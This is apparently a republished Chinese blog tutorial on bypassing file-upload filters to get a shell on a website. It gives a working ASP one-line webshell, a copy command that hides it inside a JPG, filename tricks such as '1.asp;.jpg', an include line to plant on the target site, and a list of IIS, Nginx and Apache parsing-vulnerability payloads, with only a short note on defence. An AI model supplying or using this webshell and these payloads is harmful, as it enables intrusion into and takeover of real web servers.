zoukankan      html  css  js  c++  java
  • 突破文件上传漏洞

    1.利用图片捆绑木马,绕过文件类型判断

    有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd来制作一句话木马呢.

    利用copy命令
    详细操作为
    1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
    2.<%eval request("keio")%>           存为1.asp(就是一句话木马)
    3.copy 1.jpg /b + 1.asp /a  2.jpg      存为1.bat文件

    解释一下代码
    复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片
    运行 1.bat 就会出现一个图片 2.jpg
    而这个2.jpg就是已经做好的木马了

    把一句话木马合并到了图片里以后
    再把以下代码插入目标网站的任意文件即可
    <% #include files="2.jpg"%>

    防御方法:主要是防止iis将图片解析成asp,aspx,php等进行执行,图片马是配合解析漏洞或者文件包含才能正常执行,iis之前版本存在解析漏洞

    IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
    IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php
    Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php
    Apache 解析漏洞 .php.一个无效后缀
    还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果

  • 相关阅读:
    Gym
    HDU
    HDU
    POJ
    洛谷P3690 Link Cut Tree (动态树)
    Gym
    P4294 [WC2008]游览计划 (斯坦纳树)
    洛谷P3264 [JLOI2015]管道连接 (斯坦纳树)
    HDU
    Controller调试接口
  • 原文地址:https://www.cnblogs.com/l1pe1/p/8410341.html
Copyright © 2011-2022 走看看